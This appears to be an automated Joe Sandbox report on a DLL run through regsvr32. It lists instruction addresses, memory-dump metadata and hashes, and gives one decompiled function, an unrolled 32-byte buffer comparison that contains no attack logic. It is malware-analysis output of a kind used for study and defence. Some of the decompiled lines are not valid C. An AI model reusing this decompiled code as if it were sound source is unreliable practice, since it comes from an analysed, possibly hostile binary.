                                                                                                                0x1004b521
                                                                                                                0x1004b521
                                                                                                                0x1004b525
                                                                                                                0x1004b529
                                                                                                                0x1004b52b
                                                                                                                0x1004b542
                                                                                                                0x1004b542
                                                                                                                0x1004b546
                                                                                                                0x1004b54a
                                                                                                                0x1004b54c
                                                                                                                0x1004b563
                                                                                                                0x1004b563
                                                                                                                0x1004b567
                                                                                                                0x1004b56b
                                                                                                                0x1004b56d
                                                                                                                0x1004b573
                                                                                                                0x1004b576
                                                                                                                0x1004b57a
                                                                                                                0x1004b57a
                                                                                                                0x00000000
                                                                                                                0x1004b56d
                                                                                                                0x1004b552
                                                                                                                0x1004b555
                                                                                                                0x1004b559
                                                                                                                0x1004b55d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b55d
                                                                                                                0x1004b531
                                                                                                                0x1004b534
                                                                                                                0x1004b538
                                                                                                                0x1004b53c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b53c
                                                                                                                0x1004b510
                                                                                                                0x1004b513
                                                                                                                0x1004b517
                                                                                                                0x1004b51b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b91a
                                                                                                                0x1004b91a
                                                                                                                0x1004b920
                                                                                                                0x1004b99f
                                                                                                                0x1004b9a1
                                                                                                                0x1004b9a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9a3
                                                                                                                0x1004b922
                                                                                                                0x1004b925
                                                                                                                0x1004b929
                                                                                                                0x1004b92b
                                                                                                                0x1004b942
                                                                                                                0x1004b942
                                                                                                                0x1004b946
                                                                                                                0x1004b94a
                                                                                                                0x1004b94c
                                                                                                                0x1004b963
                                                                                                                0x1004b963
                                                                                                                0x1004b967
                                                                                                                0x1004b96b
                                                                                                                0x1004b96d
                                                                                                                0x1004b984
                                                                                                                0x1004b984
                                                                                                                0x1004b988
                                                                                                                0x1004b98c
                                                                                                                0x1004b98e
                                                                                                                0x1004b994
                                                                                                                0x1004b997
                                                                                                                0x1004b99b
                                                                                                                0x1004b99b
                                                                                                                0x00000000
                                                                                                                0x1004b98e
                                                                                                                0x1004b973
                                                                                                                0x1004b976
                                                                                                                0x1004b97a
                                                                                                                0x1004b97e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b97e
                                                                                                                0x1004b952
                                                                                                                0x1004b955
                                                                                                                0x1004b959
                                                                                                                0x1004b95d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b95d
                                                                                                                0x1004b931
                                                                                                                0x1004b934
                                                                                                                0x1004b938
                                                                                                                0x1004b93c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ac8a
                                                                                                                0x1004ac90
                                                                                                                0x1004ad03
                                                                                                                0x1004ad05
                                                                                                                0x1004ad07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad07
                                                                                                                0x1004ac92
                                                                                                                0x1004ac95
                                                                                                                0x1004ac99
                                                                                                                0x1004ac9b
                                                                                                                0x1004acae
                                                                                                                0x1004acae
                                                                                                                0x1004acb2
                                                                                                                0x1004acb6
                                                                                                                0x1004acb8
                                                                                                                0x1004accb
                                                                                                                0x1004accb
                                                                                                                0x1004accf
                                                                                                                0x1004acd3
                                                                                                                0x1004acd5
                                                                                                                0x1004ace8
                                                                                                                0x1004ace8
                                                                                                                0x1004acec
                                                                                                                0x1004acf0
                                                                                                                0x1004acf2
                                                                                                                0x1004acf8
                                                                                                                0x1004acfb
                                                                                                                0x1004acff
                                                                                                                0x1004acff
                                                                                                                0x00000000
                                                                                                                0x1004acf2
                                                                                                                0x1004acdb
                                                                                                                0x1004acde
                                                                                                                0x1004ace2
                                                                                                                0x1004ace6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ace6
                                                                                                                0x1004acbe
                                                                                                                0x1004acc1
                                                                                                                0x1004acc5
                                                                                                                0x1004acc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acc9
                                                                                                                0x1004aca1
                                                                                                                0x1004aca4
                                                                                                                0x1004aca8
                                                                                                                0x1004acac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b05e
                                                                                                                0x1004b064
                                                                                                                0x1004b0e3
                                                                                                                0x1004b0e5
                                                                                                                0x1004b0e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0e7
                                                                                                                0x1004b066
                                                                                                                0x1004b069
                                                                                                                0x1004b06d
                                                                                                                0x1004b06f
                                                                                                                0x1004b086
                                                                                                                0x1004b086
                                                                                                                0x1004b08a
                                                                                                                0x1004b08e
                                                                                                                0x1004b090
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0ab
                                                                                                                0x1004b0af
                                                                                                                0x1004b0b1
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0cc
                                                                                                                0x1004b0d0
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0d8
                                                                                                                0x1004b0db
                                                                                                                0x1004b0df
                                                                                                                0x1004b0df
                                                                                                                0x00000000
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0b7
                                                                                                                0x1004b0ba
                                                                                                                0x1004b0be
                                                                                                                0x1004b0c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0c2
                                                                                                                0x1004b096
                                                                                                                0x1004b099
                                                                                                                0x1004b09d
                                                                                                                0x1004b0a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0a1
                                                                                                                0x1004b075
                                                                                                                0x1004b078
                                                                                                                0x1004b07c
                                                                                                                0x1004b080
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b46a
                                                                                                                0x1004b470
                                                                                                                0x1004b4ef
                                                                                                                0x1004b4f1
                                                                                                                0x1004b4f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4f3
                                                                                                                0x1004b472
                                                                                                                0x1004b475
                                                                                                                0x1004b479
                                                                                                                0x1004b47b
                                                                                                                0x1004b492
                                                                                                                0x1004b492
                                                                                                                0x1004b496
                                                                                                                0x1004b49a
                                                                                                                0x1004b49c
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b7
                                                                                                                0x1004b4bb
                                                                                                                0x1004b4bd
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d8
                                                                                                                0x1004b4dc
                                                                                                                0x1004b4de
                                                                                                                0x1004b4e4
                                                                                                                0x1004b4e7
                                                                                                                0x1004b4eb
                                                                                                                0x1004b4eb
                                                                                                                0x00000000
                                                                                                                0x1004b4de
                                                                                                                0x1004b4c3
                                                                                                                0x1004b4c6
                                                                                                                0x1004b4ca
                                                                                                                0x1004b4ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4ce
                                                                                                                0x1004b4a2
                                                                                                                0x1004b4a5
                                                                                                                0x1004b4a9
                                                                                                                0x1004b4ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4ad
                                                                                                                0x1004b481
                                                                                                                0x1004b484
                                                                                                                0x1004b488
                                                                                                                0x1004b48c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b88a
                                                                                                                0x1004b890
                                                                                                                0x1004b910
                                                                                                                0x1004b912
                                                                                                                0x1004b914
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b914
                                                                                                                0x1004b892
                                                                                                                0x1004b896
                                                                                                                0x1004b89a
                                                                                                                0x1004b89c
                                                                                                                0x1004b8b3
                                                                                                                0x1004b8b3
                                                                                                                0x1004b8b7
                                                                                                                0x1004b8bb
                                                                                                                0x1004b8bd
                                                                                                                0x1004b8d4
                                                                                                                0x1004b8d4
                                                                                                                0x1004b8d8
                                                                                                                0x1004b8dc
                                                                                                                0x1004b8de
                                                                                                                0x1004b8f5
                                                                                                                0x1004b8f5
                                                                                                                0x1004b8f9
                                                                                                                0x1004b8fd
                                                                                                                0x1004b8ff
                                                                                                                0x1004b905
                                                                                                                0x1004b908
                                                                                                                0x1004b90c
                                                                                                                0x1004b90c
                                                                                                                0x00000000
                                                                                                                0x1004b8ff
                                                                                                                0x1004b8e4
                                                                                                                0x1004b8e7
                                                                                                                0x1004b8eb
                                                                                                                0x1004b8ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b8ef
                                                                                                                0x1004b8c3
                                                                                                                0x1004b8c6
                                                                                                                0x1004b8ca
                                                                                                                0x1004b8ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b8ce
                                                                                                                0x1004b8a2
                                                                                                                0x1004b8a5
                                                                                                                0x1004b8a9
                                                                                                                0x1004b8ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ac7c

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 333b62f324e643a57c38eebfdeb7fef7e5d5ab913db64279213bad01495ba2e4
                                                                                                                • Instruction ID: 810339caa7b7e7dac7ddd777d2ba548a2bd97b04b1e928128ab02b5f2e0daaec
                                                                                                                • Opcode Fuzzy Hash: 333b62f324e643a57c38eebfdeb7fef7e5d5ab913db64279213bad01495ba2e4
                                                                                                                • Instruction Fuzzy Hash: F802A233D09BB34B87B18EB940E05667BE1DE0259132F87F8DCC0AF286C216DC5996E4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004B88A Relevance: .4, Instructions: 384COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B88A(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                                                0x1004b88a
                                                                                                                0x1004b88a
                                                                                                                0x1004b890
                                                                                                                0x1004b910
                                                                                                                0x1004b912
                                                                                                                0x1004b914
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b91a
                                                                                                                0x1004b920
                                                                                                                0x1004b99f
                                                                                                                0x1004b9a1
                                                                                                                0x1004b9a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9a9
                                                                                                                0x1004b9af
                                                                                                                0x1004ba2e
                                                                                                                0x1004ba30
                                                                                                                0x1004ba32
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba38
                                                                                                                0x1004ba3e
                                                                                                                0x1004babd
                                                                                                                0x1004babf
                                                                                                                0x1004bac1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bacd
                                                                                                                0x1004bb4d
                                                                                                                0x1004bb4f
                                                                                                                0x1004bb51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb57
                                                                                                                0x1004bb5d
                                                                                                                0x1004bbdc
                                                                                                                0x1004bbde
                                                                                                                0x1004bbe0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbe6
                                                                                                                0x1004bbec
                                                                                                                0x1004bc6b
                                                                                                                0x1004bc6d
                                                                                                                0x1004bc6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc7d
                                                                                                                0x1004bc7f
                                                                                                                0x1004b862
                                                                                                                0x1004b86a
                                                                                                                0x1004b86c
                                                                                                                0x1004b448
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004b879
                                                                                                                0x1004b87f
                                                                                                                0x1004bc98
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x1004b87f
                                                                                                                0x1004bc8c
                                                                                                                0x1004bc92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc92
                                                                                                                0x1004bbf5
                                                                                                                0x1004bbf7
                                                                                                                0x1004bc0e
                                                                                                                0x1004bc16
                                                                                                                0x1004bc18
                                                                                                                0x1004bc2f
                                                                                                                0x1004bc37
                                                                                                                0x1004bc39
                                                                                                                0x1004bc50
                                                                                                                0x1004bc58
                                                                                                                0x1004bc5a
                                                                                                                0x1004bc67
                                                                                                                0x1004bc67
                                                                                                                0x00000000
                                                                                                                0x1004bc5a
                                                                                                                0x1004bc46
                                                                                                                0x1004bc4a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc4a
                                                                                                                0x1004bc25
                                                                                                                0x1004bc29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc29
                                                                                                                0x1004bc04
                                                                                                                0x1004bc08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bc08
                                                                                                                0x1004bb66
                                                                                                                0x1004bb68
                                                                                                                0x1004bb7f
                                                                                                                0x1004bb87
                                                                                                                0x1004bb89
                                                                                                                0x1004bba0
                                                                                                                0x1004bba8
                                                                                                                0x1004bbaa
                                                                                                                0x1004bbc1
                                                                                                                0x1004bbc9
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbd8
                                                                                                                0x1004bbd8
                                                                                                                0x00000000
                                                                                                                0x1004bbcb
                                                                                                                0x1004bbb7
                                                                                                                0x1004bbbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bbbb
                                                                                                                0x1004bb96
                                                                                                                0x1004bb9a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb9a
                                                                                                                0x1004bb75
                                                                                                                0x1004bb79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb79
                                                                                                                0x1004bad7
                                                                                                                0x1004bad9
                                                                                                                0x1004baf0
                                                                                                                0x1004baf8
                                                                                                                0x1004bafa
                                                                                                                0x1004bb11
                                                                                                                0x1004bb19
                                                                                                                0x1004bb1b
                                                                                                                0x1004bb32
                                                                                                                0x1004bb3a
                                                                                                                0x1004bb3c
                                                                                                                0x1004bb49
                                                                                                                0x1004bb49
                                                                                                                0x00000000
                                                                                                                0x1004bb3c
                                                                                                                0x1004bb28
                                                                                                                0x1004bb2c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb2c
                                                                                                                0x1004bb07
                                                                                                                0x1004bb0b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004bb0b
                                                                                                                0x1004bae6
                                                                                                                0x1004baea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004baea
                                                                                                                0x1004ba47
                                                                                                                0x1004ba49
                                                                                                                0x1004ba60
                                                                                                                0x1004ba68
                                                                                                                0x1004ba6a
                                                                                                                0x1004ba81
                                                                                                                0x1004ba89
                                                                                                                0x1004ba8b
                                                                                                                0x1004baa2
                                                                                                                0x1004baaa
                                                                                                                0x1004baac
                                                                                                                0x1004bab9
                                                                                                                0x1004bab9
                                                                                                                0x00000000
                                                                                                                0x1004baac
                                                                                                                0x1004ba98
                                                                                                                0x1004ba9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba9c
                                                                                                                0x1004ba77
                                                                                                                0x1004ba7b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba7b
                                                                                                                0x1004ba56
                                                                                                                0x1004ba5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba5a
                                                                                                                0x1004b9b8
                                                                                                                0x1004b9ba
                                                                                                                0x1004b9d1
                                                                                                                0x1004b9d9
                                                                                                                0x1004b9db
                                                                                                                0x1004b9f2
                                                                                                                0x1004b9fa
                                                                                                                0x1004b9fc
                                                                                                                0x1004ba13
                                                                                                                0x1004ba1b
                                                                                                                0x1004ba1d
                                                                                                                0x1004ba2a
                                                                                                                0x1004ba2a
                                                                                                                0x00000000
                                                                                                                0x1004ba1d
                                                                                                                0x1004ba09
                                                                                                                0x1004ba0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ba0d
                                                                                                                0x1004b9e8
